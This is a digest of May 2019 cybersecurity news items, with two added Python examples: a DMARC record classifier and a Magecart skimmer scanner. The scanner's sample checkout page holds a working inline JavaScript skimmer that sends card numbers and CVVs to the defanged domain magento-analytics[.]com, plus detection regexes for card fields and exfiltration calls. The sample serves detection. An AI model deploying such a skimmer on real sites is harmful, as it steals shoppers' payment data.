The Hill
May 10, 2019
House
Democratic chairmen on Friday reintroduced a bill to protect U.S. election
systems against cyberattacks, including requiring President Trump to produce a
“national strategy for protecting democratic institutions.” The Election
Security Act is aimed at reducing risks posed by cyberattacks by foreign
entities or other actors against U.S. election systems. The national strategy
from President Trump would “protect against cyber attacks, influence
operations, disinformation campaigns, and other activities that could undermine
the security and integrity of United States democratic institutions.” The bill
is sponsored by House Homeland Security Committee Chairman Bennie Thompson
(D-Miss.), House Administration Committee Chairwoman Zoe Lofgren (D-Calif.) and
Rep. John Sarbanes (D-Md.), the chairman of the Democracy Reform Task Force.
The Hill
May 10, 2019
Lawmakers
on Friday introduced a resolution to require members and employees of the House
of Representatives to undergo annual cybersecurity and information technology
training. The Congressional Cybersecurity Training Resolution, sponsored by
Reps. Kathleen Rice (D-N.Y.) and John Katko (R-N.Y.), would require the chief
administrative officer of the House to carry out annual cyber and IT training
for House members, officers and employees. While House employees are already required
to undergo this training, Rice in a statement said that “it’s past time” House
members be “held to the same standard.” “Cyberattacks continue to pose a
growing and vexing threat at nearly every level of government and Congressional
Offices are no exception,” Rice said. “If we want to effectively counter those
threats, then we need to make sure Members of Congress are equipped with the
tools and knowledge to play an active role in this fight."
FCW
May 9, 2019
Lawmakers
and policy experts are demonstrating increased interest in open source
technology as a means to solving longstanding challenges and road blocks around
election security. State and local governments rely on proprietary software and
hardware from a small handful of private vendors to power their voting
machines, voter registration systems and other technologies. Those vendors have
historically been reluctant or unwilling to allow third-party audits of their
products, and when outside researchers have gotten their hands on voting
machines or probed commonly used software like voter registration systems,
they've found extensive and worrying cybersecurity vulnerabilities in nearly
every model. That reluctance has led to a number of projects that have sprouted
up over the past year from organizations aiming to disrupt the status quo. One
such organization, Voting Works, was created last year in partnership with the
non-profit Center for Democracy and Technology and seeks to build "secure,
usable, affordable and open-source voting machines" that will help to
restore trust in the modern election system.
The Hill
May 8, 2019
Sen. Angus
King (I-Maine) and Rep. Mike Gallagher (R-Wis.) announced Wednesday that they
will lead the newly established Cyberspace Solarium Commission (CSC), a group
of government and industry officials working to create a report on how to
defend the U.S. in cyberspace. The CSC, established by the 2019 National
Defense Authorization Act (NDAA), will hold “regular information-gathering
hearings” to review cyber threats, with the goal of creating a report that
includes “strategic recommendations” to prevent cyberattacks in a changing
global landscape, according to the chairmen. As stated in the 2019 NDAA, the
CSC has until Sept. 1 to send its report to Congress and multiple federal
agencies. King and Gallagher said the rollout of the report will also include
hearings to discuss the report’s findings involving congressional committees on
defense, intelligence and homeland security.
FCW
May 8, 2019
Congress
wants more cyber warriors, but they're hard to hold onto, according to Acting
Defense Secretary Patrick Shanahan. Testifying May 8 on the 2020 defense budget
before the Senate Appropriations Subcommittee on Defense, Shanahan said he's
happy to invest in more cyber scholarship programs, training ranges and red team
capabilities, but keeping cyber specialists onboard is the real challenge.
"Our biggest challenge with the red teams is keeping the people,"
Shanahan said, "We get out-recruited." Sen. Jerry Moran (R-Kan.)
suggested Shanahan and the Defense Department lean more on the National Guard,
which has members who often work for tech companies full-time and serve on the
weekends, to bolster cyber warrior capabilities.
Bloomberg
Law
May 7, 2019
Equifax
Inc. and other large credit reporting agencies would face mandatory penalties
for consumer data breaches under a bicameral Democratic bill. The agencies
could face fines of $100 for each person who had one piece of personal
information compromised, and an additional $50 for each additional piece of
information compromised, under the legislation by Democratic presidential contender
Elizabeth Warren (D-Mass.), Sen. Mark Warner (D-Va.), and Reps. Elijah Cummings
(D-Md.) and Raja Krishnamoorthi (D-Ill.). The bill comes as lawmakers
increasingly are focused on data privacy issues. Equifax would have had to pay
at least $1.5 billion in penalties for its 2017 data breach if the legislation
had been law then, the lawmakers said in a statement. The breach, revealed in
September 2017, exposed the personal information of more than 143 million
people. “Our bill would hold companies like Equifax accountable for failing to
protect consumer data, compensate consumers injured by these breaches, and help
ensure that these breaches never happen again,” Warren said in a May 7
statement.
Orlando
Sentinel
May 6, 2019
When U.S.
Sen. Bill Nelson was castigated by his Republican challenger, Gov. Rick Scott,
last year for saying Russian hackers had broken into Florida voting systems,
Nelson’s colleague, Marco Rubio, was aware of the breach. But Rubio couldn’t
defend Nelson because, a spokesman for the senator said, he wasn’t allowed to
divulge classified information. Rubio, R-Miami, declined to be interviewed for
this story. Nelson, D-Orlando, warned last year about successful hacking
attempts in 2016 but said he could not identify which county or counties had
been penetrated, saying the information was classified. No other senator backed
him up, and Scott and fellow Republicans attacked Nelson for what GOP campaign
emails called his “alarming claims” and “extremely reckless behavior.”
ADMINISTRATION
Gov Info
Security
May 10, 2019
The FBI and
the Department of Homeland Security have issued a joint warning about new
malware called "Electricfish." Investigators suspect it was developed
by the advanced persistent threat group Hidden Cobra, which has been linked to
North Korea. A warning released by the U.S. Computer Emergency Readiness Team
on Thursday does not indicate if any organizations have sustained an attack
from Hidden Cobra, also known as the Lazarus Group, using the Electricfish
malware. Because investigators were able to reverse-engineer some of the code,
however, there's a possibility it is operating in the wild and has been used in
some way by the group.
Nextgov
May 10, 2019
The vast
majority of the 2020 presidential candidates aren’t taking advantage of a basic
email security tool that could help prevent phishing attacks, industry
researchers found. Only three of the 24 declared candidates in the 2020
presidential race are fully enforcing Domain-based Message Authentication,
Reporting and Conformance, or DMARC, a security protocol that protects against
email spoofing, according to a blog post published Friday by the security firm
Valimail. By failing to use the tool, candidates could leave themselves
vulnerable to the types of phishing attacks that exposed thousands of the
Democratic National Committee’s internal emails during the 2016 election.
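"Fully enforcing" DMARC means the record published at _dmarc.<domain> carries a policy of p=quarantine or p=reject that applies to all mail; a p=none record only generates reports, and a receiver that finds nothing there applies no policy at all. The script below is an added example, not code from the Nextgov or Valimail article: it parses DMARC TXT records and classifies how much protection each one actually gives. The campaign domains and their records are constructed, and no DNS lookups are performed, so it runs offline.

```python
"""Classify DMARC records by how much protection they actually provide.

Added example; not code from the Nextgov or Valimail article. The campaign
domains and TXT records below are constructed. Real checks would look up the
TXT record at _dmarc.<domain>; no DNS lookups are done here, so this runs offline.
"""
import re

# DMARC records are "tag=value" pairs separated by semicolons (RFC 7489, 6.4).
_TAG_RE = re.compile(r"\s*([A-Za-z]+)\s*=\s*([^;]*?)\s*(?:;|$)")


def parse_dmarc(record: str) -> dict:
    """Return the record's tags as a lowercase-keyed dict.

    A record that does not start with v=DMARC1 is not a DMARC record at all
    (an SPF record published at _dmarc, say), so an empty dict is returned.
    """
    tags = {m.group(1).lower(): m.group(2) for m in _TAG_RE.finditer(record)}
    if tags.get("v") != "DMARC1":
        return {}
    return tags


def enforcement_level(record: str) -> str:
    """Classify a DMARC record as 'none', 'monitor', 'partial' or 'enforced'.

    none     - no usable record: receivers apply no DMARC policy.
    monitor  - p=none (or an invalid/missing p with a rua present, which RFC 7489
               6.6.3 says to treat as p=none): reports flow, spoofed mail is delivered.
    partial  - quarantine/reject that does not cover all mail: pct below 100,
               or sp=none leaving the sender's subdomains spoofable.
    enforced - p=quarantine or p=reject applied to all mail and subdomains.
    """
    tags = parse_dmarc(record)
    if not tags:
        return "none"
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        # Missing or invalid p: a record with a rua is treated as p=none, else ignored.
        return "monitor" if tags.get("rua") else "none"
    if policy == "none":
        return "monitor"
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100  # pct must be an integer; treat a malformed value as the default
    sub_policy = tags.get("sp", policy).lower()
    if pct < 100 or sub_policy == "none":
        return "partial"
    return "enforced"


# Constructed records for hypothetical campaign domains (not real candidates).
SAMPLE_RECORDS = {
    "campaign-a.example": "v=DMARC1; p=reject; rua=mailto:dmarc@campaign-a.example",
    "campaign-b.example": "v=DMARC1; p=none; rua=mailto:dmarc@campaign-b.example",
    "campaign-c.example": "v=DMARC1; p=quarantine; pct=10; sp=none",
    "campaign-d.example": "v=spf1 include:_spf.example.net -all",  # SPF, not DMARC
    "campaign-e.example": "",  # nothing published at _dmarc
}


def summarize(records: dict) -> dict:
    """Map each domain to its enforcement level."""
    return {domain: enforcement_level(rec) for domain, rec in records.items()}


if __name__ == "__main__":
    for domain, level in summarize(SAMPLE_RECORDS).items():
        print(f"{domain:22s} {level}")
```

Only campaign-a in the constructed set counts as enforced; campaign-c shows the case that trips up simple "is p set to quarantine?" checks, since pct=10 and sp=none leave most mail, and every subdomain, unprotected.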
Fifth
Domain
U.S. Cyber
Command is reconsidering how it buys and develops the tools cyber warriors
need. The Joint Cyber Warfighting Architecture (JCWA), was established by Cyber
Command within the last year to guide capability development priorities. Cyber
is unique within the Department of Defense in that from an operational
perspective nearly all aspects are joint. This means in the traditional
warfighting realm, the services are responsible for manning, training and
equipping for a certain function, infantry or fighter pilots, for example.
While those forces are part of a theater-wide campaign plan beneath a combatant
command, they are still deployed under their own services. In cyber, by
contrast, the services don’t own any of the offensive cyber teams or
capabilities. While developed by the services, they are deployed by Cyber
Command in support of combatant commands through Joint Force Headquarters.
Nextgov
May 10, 2019
The number
of high-risk security incidents involving tax preparers and software jumped by
50 percent from 2017 to 2018, from 212 to 336. But, despite the growing number
of citizens filing taxes digitally and the rise in incidents, the IRS remains
largely powerless to police third-party providers, according to a watchdog
report. “Federal law and guidance require that the Internal Revenue Service
protect the confidentiality, integrity, and availability of the sensitive
financial and taxpayer information that resides on its systems,” a new
Government Accountability Office report states. “However, taxpayer information
held by third-party providers—such as paid tax return preparers and tax
preparation software providers—generally falls outside of these requirements,
according to IRS officials.” The scope of the problem is large, as last year,
90 percent of taxes were filed digitally through a third party—either a tax
accountant or online service. The agency has issued a list of 140 security
controls based on standards set by the National Institute of Standards and
Technology. However, those controls are voluntary and currently only a third of
providers follow them.
FCW
May 9, 2019
The new
cyber workforce executive order looks to make it easier for employees to take
on cybersecurity roles within government, but agency IT officials point out the
measure has limitations. Shane Barney, chief information security officer of
the United States Citizenship and Immigration Services, said the order still
leaves the challenge of keeping employees in the building. "What I'm not
sure how much will get addressed with the executive order is, what about
retention?" he said at a May 9 event hosted by Government CIO. "Where
government is unbelievably good, is we can bring in fresh talent … then we'll
train them like there's no tomorrow" before they get hired by the private
sector. Barney said government uses "some really great things" like
cyber pay and progressing up the general schedule as incentives for retaining
some employees, but he still sees employees, after the training and experience
provided by government, head out the door.
CyberScoop
May 9, 2019
The federal
Election Assistance Commission has appointed Jerome Lovato, a former Colorado
state election official, as head of the commission’s program for testing and
certifying voting systems, according to a commission email obtained by
CyberScoop. Lovato replaces Ryan Macias, who was filling the role in an acting
capacity and will step down this month. The crucial EAC program works with the
country’s top voting equipment vendors to certify and decertify voting system
hardware and software. Lovato’s appointment, which was first reported by
Politico, comes as the commission prepares to help secure the 2020 election, a
vote that U.S. officials have warned will be targeted by foreign adversaries.
Senators are expected to raise those issues at an EAC oversight hearing next
week.
Federal
News Network
Each of the
three military departments would be given the discretion to appoint a new
senior, Senate-confirmed official to handle information technology issues under
a legislative proposal the Pentagon is preparing to send to Capitol Hill. The
Army, Navy and Air Force have all signed onto the proposal, but its chief
proponent is the Department of the Navy. It is the successor to Navy officials’
earlier attempt to internally restructure their bureaucracy and designate a new
Assistant Secretary of the Navy for Information Management. The legislative
proposal differs from the previous effort in that it would let each of the
military departments add a fifth assistant secretary without doing away with
any of the others. But the basic idea is the same: the Navy believes it needs
an IT and data management official who is both at the most senior levels of its
organizational chart and who is focused on those issues full time.
The
Washington Post
May 7, 2019
In the wake
of a military cyberoperation that defense officials have credited with helping
safeguard last year’s midterm elections, the Pentagon’s Cyber Command is
hunting inside other countries’ networks for threats and to gain insights to
thwart foreign interference in the 2020 campaign, officials said. Code-named
Synthetic Theology, last year’s operation leveraged new authorities, granted by
the president and Congress, enabling U.S. agencies to become more aggressive in
foreign cyberspace in defense of the nation. Though the operation has ended,
Cybercom is continuing its close relationship with the National Security Agency
and working to build partnerships with other nations, other U.S. agencies and
American industry, senior Cybercom officials said Tuesday in their first
extensive public briefing on efforts to combat election interference and other
threats. “Our goal is to have no interference in our elections,” said Air Force
Maj. Gen. Tim Haugh, who heads the command’s cyber national mission force.
“We’re going to support [the Department of Homeland Security] and FBI in the
missions they’ve been assigned. But ideally, no foreign actor is going to
target our electoral process.”
FCW
What if
clicking an email phishing link could get you fired? Cyber hygiene is such a
problem for the Navy that the service is considering sanctions for personnel
who lack basic cyber hygiene. "One of the biggest problems we have quite
frankly is one of the least costly to address, which is just hygiene. And
that's an education campaign to make sure our people understand how critical
cybersecurity is," the Navy's number two, Thomas Modly, told reporters
following his keynote address at the Sea Air Space conference in National
Harbor. Modly stressed that something drastic was needed to highlight the
importance of cyber hygiene. Noting that some private companies run internal
phishing campaigns and can terminate an employee who takes the bait a certain
number of times, Modly said the Navy is looking at punitive measures for users
to get them to take cybersecurity seriously.
The
Baltimore Sun
Baltimore
city government computers were infected with ransomware Tuesday, the mayor’s
office said, the second time in just over a year that hackers demanding payment
disrupted the city’s technology systems. “Employees are working diligently to
locate the source and extent of the infection,” said Lester Davis, a spokesman
for Democratic Mayor Bernard C. “Jack” Young. Davis said critical systems,
including 911 and 311, had not been affected, but that the majority of city
servers were shut down. The effects ranged from a City Council committee
canceling a hearing on gun violence to water customers being unable to get
billing questions answered. By the afternoon, Davis said, city teams had the
ransomware quarantined. But the cause and scale of the problem were not clear
Tuesday evening and Davis did not know when the affected systems would be back
online.
INDUSTRY
Reuters
May 10, 2019
Symantec
Corp faces an uphill battle to turn around its business and win investor
confidence, analysts said on Friday, after Chief Executive Officer Greg Clark
became the fifth top executive in six months to leave the cybersecurity
company. Clark's shock departure on Thursday came along with a gloomy set of
quarterly results that fell short of expectations on revenue and a warning on
profit, triggering a 15 percent slump in the company's shares and erasing more
than $2 billion in market cap. At least six brokerages cut their price targets
on the stock, which is on track to give up most of its gains this year.
"Investors were desperately hoping to see some stabilization for the
current quarter, but what they got instead was a number of negative surprises
in the form of the company's CEO heading out and its struggles to grow
sales," Investing.com analyst Haris Anwar said.
Gov Info
Security
May 9, 2019
Accounting
software giant Wolters Kluwer says it's continuing to attempt to recover from a
malware attack that disrupted services for users of its cloud-based services.
While some online chatter has suggested that ransomware may have been involved,
the company has yet to publicly name the strain of malware involved. Wolters
Kluwer is a $4.8 billion global information services company based in the
Netherlands that develops CCH, a suite of tax and accounting software that's
available in both on-premises and software-as-a-service form. "Our
customers include 90 percent of U.S. academic medical centers, 93 percent of
Fortune 500 companies, 100 percent of the top U.S. accounting firms and 90
percent of the world's top banks," according to the company's 2018 annual
report. On Monday, customers of the company's cloud-based products began
reporting that they were unable to access CCH software and services, that the
company's support site was also unreachable and that the company's customer
representatives didn't know what was happening.
The Wall
Street Journal
May 9, 2019
As
companies struggle to fill hundreds of thousands of open cybersecurity jobs
around the U.S. they are casting a wider net to find and develop experts,
pursuing workers without traditional four-year degrees or formal experience to
help them protect computer networks and customer data. Facing a shortage of
skilled workers to defend against digital attackers, employers like
International Business Machines Corp. and Palo Alto Networks Inc. are pouring
millions of dollars into new partnerships with universities and training
programs.
Nextgov
May 8, 2019
International
spies are hammering government networks harder than ever, according to the
latest Verizon Data Breach Investigations Report released Wednesday. The 2019
report shows a 168 percent increase year-over-year in the number of government
network breaches linked directly to state-sponsored actors. The growth
solidifies cyber espionage atop the list of threats to the public sector for
the second year in a row. “Cyber-espionage is rampant in the public sector,
with state-affiliated actors accounting for 79 percent of all breaches
involving external actors,” Verizon analysts wrote in the report. “Privilege
misuse and error by insiders account for 30 percent of breaches.” The public
sector had 23,399 reported incidents in the report's latest data set, with 330
confirmed instances of data being disclosed through a breach. While crimeware
(4,758 incidents) and
lost or stolen assets (2,820) outpaced other reported incidents, the misuse of
privileged credentials topped the list with more than 13,000 incidents.
CyberScoop
May 8, 2019
Thieves have
stolen more than $40 million worth of bitcoin from Binance, one of the world’s
largest cryptocurrency exchanges, as part of a “large scale” security incident
affecting roughly 2 percent of its bitcoin holdings, the company announced
Tuesday. Hackers stole two-factor authentication keys, API data, and
“potentially other info” through an attack that combined phishing and viruses,
Binance said in a May 7 statement. The result was the withdrawal of 7,000
bitcoin, worth nearly $41 million at the time of the heist, from Binance’s “hot
wallet” when the time was right. No user funds were affected by the breach.
Ars Technica
May 8, 2019
More than
100 e-commerce sites around the world are infected with malicious code designed
to surreptitiously skim payment card data from visitors after they make
purchases, researchers reported on Wednesday. Among those infected are US-based
websites that sell dental equipment, baby merchandise, and mountain bikes. In
total, researchers with China-based Netlab 360 found 105 websites that executed
card-skimming JavaScript hosted on the malicious domain
magento-analytics[.]com. While the domain returns a 403 error to browsers that
try to visit it, a host of magento-analytics[.]com URLs host code that’s
designed to extract the name, number, expiration date, and CVV of payment cards
that are used to make purchases. The e-commerce sites are infected when the attackers
add links that cause the malicious JavaScript to be executed.
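The injection pattern described above, a script tag pointing at an attacker-controlled domain or inline JavaScript that reads the card fields and sends them off-page, is something a shop operator can scan their own checkout page for. The script below is an added example, not code from Ars Technica or Netlab 360: it extracts every script reference from a page, flags external scripts whose host is not on an allowlist, and flags inline scripts that both touch card fields and contain a network sink. The checkout page, the first-party hosts shop.example and cdn.shop.example, and the allowlist are constructed; the only real indicator used is the magento-analytics[.]com domain named in the report, kept defanged in the sample.

```python
"""Scan a checkout page for Magecart-style skimmer indicators.

Added example; not code from the Ars Technica article or the Netlab 360 report.
The checkout page, the first-party hosts shop.example / cdn.shop.example and
the allowlist are constructed. The one real indicator is the
magento-analytics[.]com domain named in the report, kept defanged in the sample.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) shop legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Names a skimmer has to touch to read card data out of the form...
CARD_FIELD_RE = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
# ...and the usual ways inline JavaScript ships that data off the page.
EXFIL_SINK_RE = re.compile(
    r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)


def refang(text: str) -> str:
    """Turn the defanged 'example[.]com' form back into a parseable hostname."""
    return text.replace("[.]", ".")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_skimmer_indicators(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return (kind, detail) findings: scripts loaded from hosts not on the
    allowlist, and inline scripts that both read card fields and send data."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(refang(src)).hostname
        # Relative URLs have no host and are first-party by definition.
        if host and host not in allowed_hosts:
            findings.append(("external_script", host))
    for body in parser.inline:
        if CARD_FIELD_RE.search(body) and EXFIL_SINK_RE.search(body):
            findings.append(("inline_skimmer", " ".join(body.split())[:60]))
    return findings


# Constructed checkout page: two legitimate scripts, one injected script tag,
# and one injected inline skimmer of the kind the report describes.
CHECKOUT_PAGE = """
<html><body>
<form id="checkout">
  <input name="cc_number"> <input name="expiry"> <input name="cvv">
</form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/vendor.js"></script>
<script src="https://magento-analytics[.]com/analytics.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = document.querySelector('[name=cc_number]').value + '|' +
            document.querySelector('[name=cvv]').value;
    new Image().src = 'https://magento-analytics[.]com/c.php?d=' + btoa(d);
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in find_skimmer_indicators(CHECKOUT_PAGE):
        print(kind, detail)
```

This is an after-the-fact check on served HTML; a Content-Security-Policy script-src allowlist and Subresource Integrity hashes on third-party scripts stop the same injected script from executing in the browser in the first place.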
Gov Info
Security
May 8, 2019
A
sophisticated nation-state spy network has quietly run a backdoor on
Microsoft Exchange servers that gave attackers unprecedented access to the
emails of at least three targets over five years, security firm ESET warns.
Since at least 2014, Turla, an advanced persistent threat group with suspected
ties to the Russian government, has used malware called LightNeuron, which
installs as a malicious Exchange transport agent, to control mail flowing
through compromised Exchange servers, according to the ESET report released
Tuesday.
This backdoor allowed the spies to read, modify or block any emails passing
through the targeted mail servers, ESET says. The attackers also had the
ability to compose new emails and send them under the names of legitimate
users, the research shows. The targets of the attack included a ministry of
foreign affairs in an Eastern European country, a regional diplomatic
organization in the Middle East and an unknown Brazilian organization, ESET
says.
The
Financial Times
May 7, 2019
Orange has
made its biggest move into the cyber security market after acquiring Belgian
technology company SecureLink in a deal that values the company at €515m
including debt. SecureLink, based near Antwerp, is owned by Investcorp and its
management and operates in eight European countries. It had €248m of revenue in
2018. It issued a convertible bond on the Oslo stock exchange in February to
raise €150m. It is Orange’s largest acquisition since it acquired some Airtel
assets in west Africa in 2016 and the second significant cyber security
acquisition that Orange has made this year. It acquired UK security company
SecureData in February for an undisclosed sum. The French company has identified
cyber security and banking as new growth areas for its traditional telecoms
business. BT has also targeted security as a growth area within its Global
Services division and employs 2,600 workers across the world.
AP
May 6, 2019
Microsoft
announced an ambitious effort it says will make voting secure, verifiable and
more transparent with open-source software. Two of the three top U.S. election
vendors have expressed interest in potentially incorporating the software into
their voting systems. The software kit is being developed with Galois, an
Oregon-based company separately creating a secure voting system prototype under
contract with the Pentagon's advanced research agency, DARPA. Dubbed
"ElectionGuard," the Microsoft kit will be available this summer, the
company says, with early prototypes ready to pilot for next year's general
elections. CEO Satya Nadella announced the initiative Monday at a developer's
conference in Seattle. Nadella said the program's software would help
"modernize all of the election infrastructure everywhere in the world."
INTERNATIONAL
Wired
May 10, 2019
The hack of
health insurance giant Anthem Inc. has loomed large in the public consciousness
since it first came to light in 2015—not just as one of the biggest breaches of
all time, but also as a potential example of the Chinese government's
longstanding cyber espionage campaign. Hackers stole names, birth dates,
addresses, Social Security numbers, and employment details from 78 million
Anthem customers. And for years China was reported to be behind it. But when
the Department of Justice unsealed an indictment Thursday evening charging two
Chinese nationals for the Anthem attack, any indication of the alleged hackers'
motives or affiliation was noticeably absent. The US government accused
32-year-old Fujie Wang and an unnamed codefendant of being “members of a
hacking group operating in China” who “used extremely sophisticated techniques
to hack into the computer networks of the Victims.” In addition to Anthem, the
indictment alleges they were responsible for three other large corporate
intrusions, against a basic materials company, a communications firm, and a
tech company. But it does not go on to characterize their motivations or goals.
Reuters
May 10, 2019
Leading
Western industrial powers will for the first time jointly simulate a major
cross-border cyber security attack on the financial sector next month, French
officials said on Friday. The exercise, organized by the French central bank
under France's presidency of the Group of Seven nations (G7), will be based on
the scenario of a technical component widely used in the financial sector
becoming infected with malware, said Nathalie Aufauvre, the Bank of France's
director general for financial stability. Institutions such as the European
Central Bank and the Bank of England have already conducted such tests, but the
June exercise will be the first across borders at the G7 level, Aufauvre told a
cyber security conference at the bank. "Cyber threats are proof that we
need more multilateralism and more cooperation between our countries,"
French Finance Minister Bruno Le Maire told the conference.
Vice
Motherboard
May 8, 2019
Leading
cryptographic experts believe a Russia-designed algorithm pitched to an
international standards body contains a flaw that could potentially undermine
the security of encrypted data. The Russian delegation who designed the
algorithm say the flaw is a coincidence, but multiple people deciding whether
the algorithm should become a standard aren't convinced. The algorithm was
discussed at an April meeting in Tel Aviv of a working group of the
International Organization for Standardization (ISO), the body that decides
whether cryptographic algorithms put forward by member countries become
standards. At the meeting, Russian officials weren’t very happy, according to
Dr. Tomer Ashur, a researcher with KU Leuven University who represented the
Belgian delegation. Before approving the algorithm, ISO experts said they
wanted to wait six more months to better understand the security implications
of a newly discovered issue in the algorithm. The delay is occurring because,
in January, researcher Léo Perrin published a paper about two Russian
algorithms, including the one under consideration, that share a component
known in cryptography as an “S-box,” the substitution table at the core of a
cipher's resistance to cryptanalysis, and showed that it has a hidden
structure. Perrin is affiliated with Inria, the French national institute for
the digital sciences.
The New York Times
May 6, 2019
Chinese
intelligence agents acquired National Security Agency hacking tools and
repurposed them in 2016 to attack American allies and private companies in
Europe and Asia, a leading cybersecurity firm has discovered. The episode is
the latest evidence that the United States has lost control of key parts of its
cybersecurity arsenal. Based on the timing of the attacks and clues in the
computer code, researchers with the firm Symantec believe the Chinese did not
steal the code but captured it from an N.S.A. attack on their own computers —
like a gunslinger who grabs an enemy’s rifle and starts blasting away. The
Chinese action shows how proliferating cyberconflict is creating a digital wild
West with few rules or certainties, and how difficult it is for the United
States to keep track of the malware it uses to break into foreign networks and
attack adversaries’ infrastructure.
CyberScoop
May 6, 2019
Israel’s military announced Sunday it had launched airstrikes on a
building allegedly housing a number of Hamas soldiers that were preparing to
launch a cyberattack against Israel. Israel Defense Forces (IDF), which
launched the airstrike jointly with the Israel Security Authority, did not
detail the alleged cyberattack and other offensive capabilities Hamas was
developing, but said it had neutralized the attack before launching the
airstrikes. The incident marks the first time a government has publicly
announced it has immediately responded to a cyberattack by launching a “kinetic
attack,” a military term that describes the use of lethal force. Although this
marks a first in cyberwarfare, Paul Rosenzweig, a former deputy assistant
secretary for policy at the U.S. Department of Homeland Security, tells CyberScoop
it’s not a surprising outcome.
TECHNOLOGY
CyberScoop
May 10, 2019
Whoever came
up with “thieves rob banks because that’s where all the money is” needs to add
“digital advertising” to the updated version of the adage. Criminals simply
don’t need to go through all the trouble of stealing money from well-fortified
financial institutions when they can just trick advertisers into directly
lining their pockets. With internet ad revenue totaling more than $100 billion
in 2018, scammers are following that line of money: ad fraud is set to cost the
industry as much as $44 billion annually by 2022. Online ad fraud has become so
profitable that malware creators and botnet masters are developing new programs
and theft techniques in order to keep making a profit, according to Michael
Tiffany, president and co-founder of the bot detection company White Ops.
Ars Technica
May 9, 2019
Websites
running the Drupal, Joomla, or Typo3 content-management systems are vulnerable
to attacks that could possibly execute malicious code until administrators
install just-released patches, developers and security researchers warned. The
vulnerability resides in the PharStreamWrapper, a PHP component developed and
open-sourced by CMS maker Typo3. Indexed as CVE-2019-11831, the flaw stems from
a path-traversal bug that allows hackers to swap a site's legitimate phar
archive with a malicious one. A phar archive is used to distribute a complete
PHP application or library in a single file, in much the way a Java archive
file bundles many Java files into a single file.
via Nick
Leiserson